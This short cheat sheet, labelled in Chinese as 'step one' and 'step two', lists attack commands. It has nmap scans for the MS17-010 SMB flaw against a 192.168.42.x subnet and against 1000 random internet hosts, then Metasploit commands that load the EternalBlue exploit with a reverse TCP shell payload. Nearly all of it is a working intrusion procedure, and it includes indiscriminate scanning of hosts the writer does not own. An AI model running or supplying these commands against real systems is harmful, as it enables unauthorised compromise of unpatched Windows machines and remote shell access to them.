第一步
#
nmap -sS -Pn -n -p 445 -T4 192.168.42.* --script=smb-vuln-ms17-010.nse --host-timeout=60s
nmap -v -p139,445 --script=smb-vuln-*.nse --script-args=unsafe=1 192.168.42.226 -Pn
随机
nmap -iR 1000 -sS -PS 80 -Pn -n -p 445 -T4 --script=smb-vuln-ms17-010.nse --host-timeout=60s
第二部
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp